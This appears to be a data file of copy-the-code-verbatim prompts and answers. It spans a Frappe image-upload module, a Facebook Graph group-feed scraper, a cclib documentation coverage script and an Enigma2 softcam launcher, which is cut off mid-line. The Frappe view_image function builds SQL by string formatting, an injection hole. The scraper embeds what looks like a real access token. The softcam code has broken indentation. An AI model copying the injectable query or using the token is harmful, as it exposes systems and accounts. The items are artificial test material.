"content": "```python\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.utils.file_manager import save_file\nimport os, base64, re\nimport random\nimport json\n\[email protected]()\ndef add_node():\n\tctype = frappe.form_dict.get('ctype')\n\tparent_field = 'parent_' + ctype.lower().replace(' ', '_')\n\tname_field = ctype.lower().replace(' ', '_') + '_name'\n\tfname, content = get_uploadedImage_content(frappe.form_dict['filedata'], frappe.form_dict['filename'])\n\tif content:\n\t\timage = save_file(fname, content, 'Product Catalog', frappe.form_dict['name_field'])\n\n\tdoc = frappe.new_doc(ctype)\n\tdoc.update({\n\t\tname_field: frappe.form_dict['name_field'],\n\t\tparent_field: frappe.form_dict['parent'],\n\t\t\"is_group\": frappe.form_dict['is_group']\n\t})\n\n\tdoc.save()\t\n\treturn \"Done\"\n\[email protected]()\ndef get_uploadedImage_content(filedata, filename):\n\tfiledata = filedata.rsplit(\",\", 1)[1]\n\tuploaded_content = base64.b64decode(filedata)\n\treturn filename, uploaded_content\n\[email protected]()\ndef view_image():\n\tname = frappe.form_dict.get('name')\n\treturn frappe.db.sql(\"\"\" SELECT file_url FROM `tabFile Data` WHERE\n\t\tattached_to_name='%s' AND attached_to_doctype='Product Catalog'\"\"\"%(name))\n\[email protected]()\ndef webcam_img_upload(imgdata1,customer):\n\tdata =json.loads(imgdata1)\n\tfilename=random.randrange(1,100000,2)\n\tfilename=str(filename)+'.png'\n\n\tfname, content = get_uploadedImage_content(imgdata1,filename)\n\tif content:\n\t\timage = save_file(fname, content,'Customer',customer)\n\treturn fname\n```\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.utils.file_manager import save_file\nimport os, base64, re\nimport random\nimport json\n\[email protected]()\ndef add_node():\n\tctype = frappe.form_dict.get('ctype')\n\tparent_field = 'parent_' + ctype.lower().replace(' ', '_')\n\tname_field = ctype.lower().replace(' ', '_') + '_name'\n\tfname, content = get_uploadedImage_content(frappe.form_dict['filedata'], frappe.form_dict['filename'])\n\tif content:\n\t\timage = save_file(fname, content, 'Product Catalog', frappe.form_dict['name_field'])\n\n\tdoc = frappe.new_doc(ctype)\n\tdoc.update({\n\t\tname_field: frappe.form_dict['name_field'],\n\t\tparent_field: frappe.form_dict['parent'],\n\t\t\"is_group\": frappe.form_dict['is_group']\n\t})\n\n\tdoc.save()\t\n\treturn \"Done\"\n\[email protected]()\ndef get_uploadedImage_content(filedata, filename):\n\tfiledata = filedata.rsplit(\",\", 1)[1]\n\tuploaded_content = base64.b64decode(filedata)\n\treturn filename, uploaded_content\n\[email protected]()\ndef view_image():\n\tname = frappe.form_dict.get('name')\n\treturn frappe.db.sql(\"\"\" SELECT file_url FROM `tabFile Data` WHERE\n\t\tattached_to_name='%s' AND attached_to_doctype='Product Catalog'\"\"\"%(name))\n\[email protected]()\ndef webcam_img_upload(imgdata1,customer):\n\tdata =json.loads(imgdata1)\n\tfilename=random.randrange(1,100000,2)\n\tfilename=str(filename)+'.png'\n\n\tfname, content = get_uploadedImage_content(imgdata1,filename)\n\tif content:\n\t\timage = save_file(fname, content,'Customer',customer)\n\treturn fname\n```<|memory_end|>\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
```python
from __future__ import unicode_literals
import frappe
from frappe.utils.file_manager import save_file
import os, base64, re
import random
import json
@frappe.whitelist()
def add_node():
ctype = frappe.form_dict.get('ctype')
parent_field = 'parent_' + ctype.lower().replace(' ', '_')
name_field = ctype.lower().replace(' ', '_') + '_name'
fname, content = get_uploadedImage_content(frappe.form_dict['filedata'], frappe.form_dict['filename'])
if content:
image = save_file(fname, content, 'Product Catalog', frappe.form_dict['name_field'])
doc = frappe.new_doc(ctype)
doc.update({
name_field: frappe.form_dict['name_field'],
parent_field: frappe.form_dict['parent'],
"is_group": frappe.form_dict['is_group']
})
doc.save()
return "Done"
@frappe.whitelist()
def get_uploadedImage_content(filedata, filename):
filedata = filedata.rsplit(",", 1)[1]
uploaded_content = base64.b64decode(filedata)
return filename, uploaded_content
@frappe.whitelist()
def view_image():
name = frappe.form_dict.get('name')
return frappe.db.sql(""" SELECT file_url FROM `tabFile Data` WHERE
attached_to_name='%s' AND attached_to_doctype='Product Catalog'"""%(name))
@frappe.whitelist()
def webcam_img_upload(imgdata1,customer):
data =json.loads(imgdata1)
filename=random.randrange(1,100000,2)
filename=str(filename)+'.png'
fname, content = get_uploadedImage_content(imgdata1,filename)
if content:
image = save_file(fname, content,'Customer',customer)
return fname
```
|
[
{
"content": "Write the code verbatim:\n```python\nimport requests\r\nimport json\r\n\r\naccess_token='EAAMcWZCJ7Ui4BALHXjXKkizZANG5AhQZAL9buUS5KR6fX8YurTosJLmxTfP4WoZBiP8DFe8eqbJ2NplRPGLsve2xYIwwsbERTnX5pvsiRIvJ0So1TZAHmOHlUPVnzZCBjPdZBhkm8CBnYTV0eNjAwQiBVkroQGnaqgZD'\r\noutfile=open(\"list.csv\",\"w\")\r\n\r\n\r\ndef text_cleaning(text):\r\n text = text.encode('ascii', 'ignore').decode('ascii')\r\n #text=text.replace('\\\\','BSL')\r\n #text=text.replace('\\'','SIC')\r\n #text=text.replace(\"'\",'TLD')\r\n #text=text.replace('\"','DIC')\r\n text=text.replace('\\n','. ')\r\n #text=text.replace(')','CBR')\r\n #text=text.replace('(','OBR')\r\n text=text.replace(';',', ')\r\n #text=text.replace(',','COM')\r\n return text\r\n\r\n\r\n\r\ndef search(group_name):\r\n base_url = 'https://graph.facebook.com/search?limit=1000&type=group&q='+group_name+'&access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n for item in results_json['data']:\r\n if item['privacy']=='OPEN':\r\n try:\r\n #print item['name']\r\n outfile.write(item['id']+\";\"+item['name'])\r\n outfile.write(\"\\n\")\r\n #print ''\r\n except:\r\n pass\r\n base_url = 'https://graph.facebook.com/search?limit=1000&type=page&q='+group_name+'&access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n for item in results_json['data']:\r\n try:\r\n #print item['name']\r\n outfile.write(item['id']+\";\"+item['name'])\r\n outfile.write(\"\\n\")\r\n #print ''\r\n except:\r\n pass \r\nsearch('internships')\r\nsearch('startup')\r\nsearch('jobs')\r\noutfile.close()\r\ninfile=open(\"list.csv\",\"r\")\r\noutfile=open(\"feed.csv\",\"w\")\r\nfor line in infile:\r\n print line.split(';')[0]\r\n base_url='https://graph.facebook.com/v2.6/'+line.split(';')[0]+'/feed?access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n #while(True):\r\n #try:\r\n for item in results_json['data']:\r\n if 'message' in item:\r\n print text_cleaning(item['message'])\r\n print ''\r\n if 'updated_time' in item:\r\n outfile.write(item['id']+\";\"+text_cleaning(item['message'])+\";\"+item['updated_time'])\r\n outfile.write(\"\\n\")\r\n else:\r\n outfile.write(item['id']+\";\"+text_cleaning(item['message'])+\";\"+item['created_time'])\r\n outfile.write(\"\\n\")\r\n #base_url=results_json['paging']['next']\r\n #results=requests.get(base_url)\r\n #results_text=results.text\r\n #results_json=json.loads(results_text)\r\n #except KeyError:\r\n #break\r\n\r\noutfile.close()\r\ninfile.close()\n```\nDo not add anything else.",
"role": "user"
}
] |
[
{
"content": "Write the code verbatim:\n<|memory_start|>```python\nimport requests\r\nimport json\r\n\r\naccess_token='EAAMcWZCJ7Ui4BALHXjXKkizZANG5AhQZAL9buUS5KR6fX8YurTosJLmxTfP4WoZBiP8DFe8eqbJ2NplRPGLsve2xYIwwsbERTnX5pvsiRIvJ0So1TZAHmOHlUPVnzZCBjPdZBhkm8CBnYTV0eNjAwQiBVkroQGnaqgZD'\r\noutfile=open(\"list.csv\",\"w\")\r\n\r\n\r\ndef text_cleaning(text):\r\n text = text.encode('ascii', 'ignore').decode('ascii')\r\n #text=text.replace('\\\\','BSL')\r\n #text=text.replace('\\'','SIC')\r\n #text=text.replace(\"'\",'TLD')\r\n #text=text.replace('\"','DIC')\r\n text=text.replace('\\n','. ')\r\n #text=text.replace(')','CBR')\r\n #text=text.replace('(','OBR')\r\n text=text.replace(';',', ')\r\n #text=text.replace(',','COM')\r\n return text\r\n\r\n\r\n\r\ndef search(group_name):\r\n base_url = 'https://graph.facebook.com/search?limit=1000&type=group&q='+group_name+'&access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n for item in results_json['data']:\r\n if item['privacy']=='OPEN':\r\n try:\r\n #print item['name']\r\n outfile.write(item['id']+\";\"+item['name'])\r\n outfile.write(\"\\n\")\r\n #print ''\r\n except:\r\n pass\r\n base_url = 'https://graph.facebook.com/search?limit=1000&type=page&q='+group_name+'&access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n for item in results_json['data']:\r\n try:\r\n #print item['name']\r\n outfile.write(item['id']+\";\"+item['name'])\r\n outfile.write(\"\\n\")\r\n #print ''\r\n except:\r\n pass \r\nsearch('internships')\r\nsearch('startup')\r\nsearch('jobs')\r\noutfile.close()\r\ninfile=open(\"list.csv\",\"r\")\r\noutfile=open(\"feed.csv\",\"w\")\r\nfor line in infile:\r\n print line.split(';')[0]\r\n base_url='https://graph.facebook.com/v2.6/'+line.split(';')[0]+'/feed?access_token='+access_token\r\n results=requests.get(base_url)\r\n results_text=results.text\r\n results_json=json.loads(results_text)\r\n #while(True):\r\n #try:\r\n for item in results_json['data']:\r\n if 'message' in item:\r\n print text_cleaning(item['message'])\r\n print ''\r\n if 'updated_time' in item:\r\n outfile.write(item['id']+\";\"+text_cleaning(item['message'])+\";\"+item['updated_time'])\r\n outfile.write(\"\\n\")\r\n else:\r\n outfile.write(item['id']+\";\"+text_cleaning(item['message'])+\";\"+item['created_time'])\r\n outfile.write(\"\\n\")\r\n #base_url=results_json['paging']['next']\r\n #results=requests.get(base_url)\r\n #results_text=results.text\r\n #results_json=json.loads(results_text)\r\n #except KeyError:\r\n #break\r\n\r\noutfile.close()\r\ninfile.close()\n```<|memory_end|>\nDo not add anything else.",
"role": "user"
}
] |
```python
import requests
import json
access_token='EAAMcWZCJ7Ui4BALHXjXKkizZANG5AhQZAL9buUS5KR6fX8YurTosJLmxTfP4WoZBiP8DFe8eqbJ2NplRPGLsve2xYIwwsbERTnX5pvsiRIvJ0So1TZAHmOHlUPVnzZCBjPdZBhkm8CBnYTV0eNjAwQiBVkroQGnaqgZD'
outfile=open("list.csv","w")
def text_cleaning(text):
text = text.encode('ascii', 'ignore').decode('ascii')
#text=text.replace('\\','BSL')
#text=text.replace('\'','SIC')
#text=text.replace("'",'TLD')
#text=text.replace('"','DIC')
text=text.replace('\n','. ')
#text=text.replace(')','CBR')
#text=text.replace('(','OBR')
text=text.replace(';',', ')
#text=text.replace(',','COM')
return text
def search(group_name):
base_url = 'https://graph.facebook.com/search?limit=1000&type=group&q='+group_name+'&access_token='+access_token
results=requests.get(base_url)
results_text=results.text
results_json=json.loads(results_text)
for item in results_json['data']:
if item['privacy']=='OPEN':
try:
#print item['name']
outfile.write(item['id']+";"+item['name'])
outfile.write("\n")
#print ''
except:
pass
base_url = 'https://graph.facebook.com/search?limit=1000&type=page&q='+group_name+'&access_token='+access_token
results=requests.get(base_url)
results_text=results.text
results_json=json.loads(results_text)
for item in results_json['data']:
try:
#print item['name']
outfile.write(item['id']+";"+item['name'])
outfile.write("\n")
#print ''
except:
pass
search('internships')
search('startup')
search('jobs')
outfile.close()
infile=open("list.csv","r")
outfile=open("feed.csv","w")
for line in infile:
print line.split(';')[0]
base_url='https://graph.facebook.com/v2.6/'+line.split(';')[0]+'/feed?access_token='+access_token
results=requests.get(base_url)
results_text=results.text
results_json=json.loads(results_text)
#while(True):
#try:
for item in results_json['data']:
if 'message' in item:
print text_cleaning(item['message'])
print ''
if 'updated_time' in item:
outfile.write(item['id']+";"+text_cleaning(item['message'])+";"+item['updated_time'])
outfile.write("\n")
else:
outfile.write(item['id']+";"+text_cleaning(item['message'])+";"+item['created_time'])
outfile.write("\n")
#base_url=results_json['paging']['next']
#results=requests.get(base_url)
#results_text=results.text
#results_json=json.loads(results_text)
#except KeyError:
#break
outfile.close()
infile.close()
```
|
[
{
"content": "Reconstruct the code exactly:\n```python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019, the cclib development team\n#\n# This file is part of cclib (http://cclib.github.io) and is distributed under\n# the terms of the BSD 3-Clause License.\n\n\"\"\"Generate the coverage.rst and coverage.rst files from test results.\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom docs_common import check_cclib\n\n# Import cclib and check we are using the version from a subdirectory.\nimport cclib\ncheck_cclib(cclib)\n\n\ndef generate_coverage():\n \"\"\"Generate a string containing a reStructuredTest table\n representation of which parsers support which attributes, based on\n test results.\n \"\"\"\n lines = []\n\n # Change directory to where tests are and add it to the path. Because there are\n # separate directories for different branches/versions, and we use a symlink to\n # point to the one we want, we need to test the real path this link resolves to.\n if \"cclib_prod\" in os.path.realpath('cclib'):\n testpath = \"_build/cclib_prod\"\n else:\n assert \"cclib_dev\" in os.path.realpath('cclib')\n testpath = \"_build/cclib_dev\"\n\n os.chdir(testpath)\n\n thispath = os.path.dirname(os.path.realpath(__file__))\n sys.path.insert(1, thispath)\n\n from test.test_data import (all_modules, all_parsers, parser_names, DataSuite)\n import inspect\n ds_args = inspect.getargspec(DataSuite.__init__).args\n logpath = thispath + \"/coverage.tests.log\"\n try:\n with open(logpath, \"w\") as flog:\n stdout_backup = sys.stdout\n sys.stdout = flog\n alltests = {}\n for p in parser_names:\n assert 'parsers' in ds_args\n suite = DataSuite(parsers={p: all_parsers[p]}, modules=all_modules, stream=flog)\n suite.testall()\n alltests[p] = [{'data': t.data} for t in suite.alltests]\n sys.stdout = stdout_backup\n except Exception as e:\n print(\"Unit tests did not run correctly. Check log file for errors:\")\n with open(logpath) as fh:\n print(fh.read())\n print(e)\n sys.exit(1)\n\n ncols = len(parser_names) + 1\n colwidth = 20\n colfmt = \"%%-%is\" % colwidth\n dashes = (\"=\" * (colwidth - 1) + \" \") * ncols\n\n lines.append(dashes)\n lines.append(colfmt * ncols % tuple([\"attributes\"] + parser_names))\n lines.append(dashes)\n\n # Eventually we want to move this to cclib, too.\n not_applicable = {\n 'ADF' : ['aonames', 'ccenergies', 'mpenergies'],\n 'DALTON' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'GAMESS' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'GAMESSUK' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Gaussian' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Jaguar' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Molpro' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'NWChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'ORCA' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Psi' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'QChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n }\n not_possible = {\n 'Psi' : ['aooverlaps', 'vibirs'],\n 'QChem' : ['aooverlaps', 'etrotats'],\n }\n\n # For each attribute, get a list of Boolean values for each parser that flags\n # if it has been parsed by at least one unit test. Substitute an OK sign or\n # T/D appropriately, with the exception of attributes that have been explicitely\n # designated as N/A.\n attributes = sorted(cclib.parser.data.ccData._attrlist)\n for attr in attributes:\n parsed = [any([attr in t['data'].__dict__ for t in alltests[p]]) for p in parser_names]\n for ip, p in enumerate(parsed):\n if p:\n parsed[ip] = \"√\"\n else:\n if attr in not_applicable.get(parser_names[ip], []):\n parsed[ip] = \"N/A\"\n elif attr in not_possible.get(parser_names[ip], []):\n parsed[ip] = \"N/P\"\n else:\n parsed[ip] = \"T/D\"\n lines.append(colfmt*ncols % tuple([\"`%s`_\" % attr] + parsed))\n\n lines.append(dashes)\n lines.append(\"\")\n\n for attr in attributes:\n lines.append(\".. _`%s`: data_notes.html#%s\" % (attr, attr))\n\n return \"\\n\".join(lines)\n\nif __name__ == \"__main__\":\n print(generate_coverage())\n```\nReturn the exact text.",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code exactly:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019, the cclib development team\n#\n# This file is part of cclib (http://cclib.github.io) and is distributed under\n# the terms of the BSD 3-Clause License.\n\n\"\"\"Generate the coverage.rst and coverage.rst files from test results.\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom docs_common import check_cclib\n\n# Import cclib and check we are using the version from a subdirectory.\nimport cclib\ncheck_cclib(cclib)\n\n\ndef generate_coverage():\n \"\"\"Generate a string containing a reStructuredTest table\n representation of which parsers support which attributes, based on\n test results.\n \"\"\"\n lines = []\n\n # Change directory to where tests are and add it to the path. Because there are\n # separate directories for different branches/versions, and we use a symlink to\n # point to the one we want, we need to test the real path this link resolves to.\n if \"cclib_prod\" in os.path.realpath('cclib'):\n testpath = \"_build/cclib_prod\"\n else:\n assert \"cclib_dev\" in os.path.realpath('cclib')\n testpath = \"_build/cclib_dev\"\n\n os.chdir(testpath)\n\n thispath = os.path.dirname(os.path.realpath(__file__))\n sys.path.insert(1, thispath)\n\n from test.test_data import (all_modules, all_parsers, parser_names, DataSuite)\n import inspect\n ds_args = inspect.getargspec(DataSuite.__init__).args\n logpath = thispath + \"/coverage.tests.log\"\n try:\n with open(logpath, \"w\") as flog:\n stdout_backup = sys.stdout\n sys.stdout = flog\n alltests = {}\n for p in parser_names:\n assert 'parsers' in ds_args\n suite = DataSuite(parsers={p: all_parsers[p]}, modules=all_modules, stream=flog)\n suite.testall()\n alltests[p] = [{'data': t.data} for t in suite.alltests]\n sys.stdout = stdout_backup\n except Exception as e:\n print(\"Unit tests did not run correctly. Check log file for errors:\")\n with open(logpath) as fh:\n print(fh.read())\n print(e)\n sys.exit(1)\n\n ncols = len(parser_names) + 1\n colwidth = 20\n colfmt = \"%%-%is\" % colwidth\n dashes = (\"=\" * (colwidth - 1) + \" \") * ncols\n\n lines.append(dashes)\n lines.append(colfmt * ncols % tuple([\"attributes\"] + parser_names))\n lines.append(dashes)\n\n # Eventually we want to move this to cclib, too.\n not_applicable = {\n 'ADF' : ['aonames', 'ccenergies', 'mpenergies'],\n 'DALTON' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'GAMESS' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'GAMESSUK' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Gaussian' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Jaguar' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Molpro' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'NWChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'ORCA' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'Psi' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n 'QChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],\n }\n not_possible = {\n 'Psi' : ['aooverlaps', 'vibirs'],\n 'QChem' : ['aooverlaps', 'etrotats'],\n }\n\n # For each attribute, get a list of Boolean values for each parser that flags\n # if it has been parsed by at least one unit test. Substitute an OK sign or\n # T/D appropriately, with the exception of attributes that have been explicitely\n # designated as N/A.\n attributes = sorted(cclib.parser.data.ccData._attrlist)\n for attr in attributes:\n parsed = [any([attr in t['data'].__dict__ for t in alltests[p]]) for p in parser_names]\n for ip, p in enumerate(parsed):\n if p:\n parsed[ip] = \"√\"\n else:\n if attr in not_applicable.get(parser_names[ip], []):\n parsed[ip] = \"N/A\"\n elif attr in not_possible.get(parser_names[ip], []):\n parsed[ip] = \"N/P\"\n else:\n parsed[ip] = \"T/D\"\n lines.append(colfmt*ncols % tuple([\"`%s`_\" % attr] + parsed))\n\n lines.append(dashes)\n lines.append(\"\")\n\n for attr in attributes:\n lines.append(\".. _`%s`: data_notes.html#%s\" % (attr, attr))\n\n return \"\\n\".join(lines)\n\nif __name__ == \"__main__\":\n print(generate_coverage())\n```<|memory_end|>\nReturn the exact text.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2019, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Generate the coverage.rst and coverage.rst files from test results."""
from __future__ import print_function
import os
import sys
from docs_common import check_cclib
# Import cclib and check we are using the version from a subdirectory.
import cclib
check_cclib(cclib)
def generate_coverage():
"""Generate a string containing a reStructuredTest table
representation of which parsers support which attributes, based on
test results.
"""
lines = []
# Change directory to where tests are and add it to the path. Because there are
# separate directories for different branches/versions, and we use a symlink to
# point to the one we want, we need to test the real path this link resolves to.
if "cclib_prod" in os.path.realpath('cclib'):
testpath = "_build/cclib_prod"
else:
assert "cclib_dev" in os.path.realpath('cclib')
testpath = "_build/cclib_dev"
os.chdir(testpath)
thispath = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(1, thispath)
from test.test_data import (all_modules, all_parsers, parser_names, DataSuite)
import inspect
ds_args = inspect.getargspec(DataSuite.__init__).args
logpath = thispath + "/coverage.tests.log"
try:
with open(logpath, "w") as flog:
stdout_backup = sys.stdout
sys.stdout = flog
alltests = {}
for p in parser_names:
assert 'parsers' in ds_args
suite = DataSuite(parsers={p: all_parsers[p]}, modules=all_modules, stream=flog)
suite.testall()
alltests[p] = [{'data': t.data} for t in suite.alltests]
sys.stdout = stdout_backup
except Exception as e:
print("Unit tests did not run correctly. Check log file for errors:")
with open(logpath) as fh:
print(fh.read())
print(e)
sys.exit(1)
ncols = len(parser_names) + 1
colwidth = 20
colfmt = "%%-%is" % colwidth
dashes = ("=" * (colwidth - 1) + " ") * ncols
lines.append(dashes)
lines.append(colfmt * ncols % tuple(["attributes"] + parser_names))
lines.append(dashes)
# Eventually we want to move this to cclib, too.
not_applicable = {
'ADF' : ['aonames', 'ccenergies', 'mpenergies'],
'DALTON' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'GAMESS' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'GAMESSUK' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'Gaussian' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'Jaguar' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'Molpro' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'NWChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'ORCA' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'Psi' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
'QChem' : ['fonames', 'fooverlaps', 'fragnames', 'frags'],
}
not_possible = {
'Psi' : ['aooverlaps', 'vibirs'],
'QChem' : ['aooverlaps', 'etrotats'],
}
# For each attribute, get a list of Boolean values for each parser that flags
# if it has been parsed by at least one unit test. Substitute an OK sign or
# T/D appropriately, with the exception of attributes that have been explicitely
# designated as N/A.
attributes = sorted(cclib.parser.data.ccData._attrlist)
for attr in attributes:
parsed = [any([attr in t['data'].__dict__ for t in alltests[p]]) for p in parser_names]
for ip, p in enumerate(parsed):
if p:
parsed[ip] = "√"
else:
if attr in not_applicable.get(parser_names[ip], []):
parsed[ip] = "N/A"
elif attr in not_possible.get(parser_names[ip], []):
parsed[ip] = "N/P"
else:
parsed[ip] = "T/D"
lines.append(colfmt*ncols % tuple(["`%s`_" % attr] + parsed))
lines.append(dashes)
lines.append("")
for attr in attributes:
lines.append(".. _`%s`: data_notes.html#%s" % (attr, attr))
return "\n".join(lines)
if __name__ == "__main__":
print(generate_coverage())
```
|
[
{
"content": "Return the code unaltered:\n```python\nfrom Components.Console import Console\nfrom os import mkdir, path, remove\nfrom glob import glob\nfrom Components.config import config, ConfigSubsection, ConfigInteger, ConfigText, getConfigListEntry, ConfigSelection, ConfigIP, ConfigYesNo, ConfigSequence, ConfigNumber, NoSave, ConfigEnableDisable, configfile\nimport os\nconfig.NFRSoftcam.camdir = ConfigText(default = \"/usr/emu\", fixed_size=False)\nconfig.NFRSoftcam.camconfig = ConfigText(default = \"/usr/keys\", fixed_size=False)\ndef getcamcmd(cam):\n\tcamname = cam.lower()\n\txcamname = cam\n\tif getcamscript(camname):\n\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" start\"\n\telif \".x\" in camname:\n\t if \"mgcamd\" in camname: \n\t \treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n\t else:\t\n\t\t\temus=[]\n\t\t\ti = 0\n\t\t\tfor fAdd in glob ('/etc/*.emu'):\n\t\t\t\tsearchfile = open(fAdd, \"r\")\n\t\t\t\temustart=[]\n\t\t\t\tcam_name = xcamname.strip(\".x\")\n\t\t\t\tfor line in searchfile:\n\t\t\t\t\tif \"binname\" in line:\n\t\t\t\t\t\temus.append(line[10:])\n\t\t\t\t\t\tif cam_name in emus[i]:\n\t\t\t\t\t\t searchemu = open(fAdd, \"r\")\n\t\t\t\t\t for line in searchemu:\n\t\t\t\t\t\t\t\tif \"startcam\" in line:\n \t\t\temustart.append(line[11:])\n \t\t\temustart = emustart[0].strip()\n \t\t\tcam_count_test = emustart.count(\" \")\n \t\t\tstart_emu = emustart.split(\" \", 1 )\n \t\t\tif (cam_count_test == 0):\n \t\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n \t\t\telse: \n \t\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + start_emu[1]\n \ti = i + 1 \t\n\t\t\t\tsearchfile.close()\n\t\n\telse:\n\t\tif \"oscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\n\t\tif \"doscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\t\t\t\t\n\t\telif \"wicard\" in camname:\n\t\t\treturn \"ulimit -s 512; \" + config.NFRSoftcam.camdir.value + \\\n\t\t\t\"/\" + cam + \" -d -c \" + config.NFRSoftcam.camconfig.value + \\\n\t\t\t\"/wicardd.conf\"\n\t\telif \"camd3\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/camd3.config\"\n\t\telif \"mbox\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/mbox.cfg\"\n\t\telif \"cccam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -C \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/CCcam.cfg\"\n elif \"mgcamd\" in camname:\n\t os.system(\"rm /dev/dvb/adapter0/ca1\")\n\t os.system(\"ln -sf 'ca0' '/dev/dvb/adapter0/ca1'\") \n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\" \t\t\t\t\n\t\telif \"mpcs\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -c \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value\n\t\telif \"newcs\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -C \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/newcs.conf\"\n\t\telif \"vizcam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -b -c \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\n\t\telif \"rucam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -b\"\n \t\telif \"scam\" in camname and not \"oscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -s \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\t\t\t\n\t\telse:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n\ndef getcamscript(cam):\n\tcam = cam.lower()\n\tif cam.endswith('.sh') or cam.startswith('softcam') or \\\n\t\tcam.startswith('cardserver'):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef stopcam(cam):\n\tif getcamscript(cam):\n\t\tcmd = config.NFRSoftcam.camdir.value + \"/\" + cam + \" stop\"\n\telse:\n\t\tcmd = \"killall -15 \" + cam\n\tConsole().ePopen(cmd)\n\tprint \"[NFR-SoftCam Manager] stopping\", cam\n\ttry:\n\t\tremove(\"/tmp/ecm.info\")\n\texcept:\n\t\tpass\n\ndef __createdir(list):\n\tdir = \"\"\n\tfor line in list[1:].split(\"/\"):\n\t\tdir += \"/\" + line\n\t\tif not path.exists(dir):\n\t\t\ttry:\n\t\t\t\tmkdir(dir)\n\t\t\texcept:\n\t\t\t\tprint \"[NFR-SoftCam Manager] Failed to mkdir\", dir\n\ndef checkconfigdir():\n\tif not path.exists(config.NFRSoftcam.camconfig.value):\n\t\t__createdir(\"/usr/keys\")\n\t\tconfig.NFRSoftcam.camconfig.value = \"/usr/keys\"\n\t\tconfig.NFRSoftcam.camconfig.save()\n\tif not path.exists(config.NFRSoftcam.camdir.value):\n\t\tif path.exists(\"/usr/emu\"):\n\t\t\tconfig.NFRSoftcam.camdir.value = 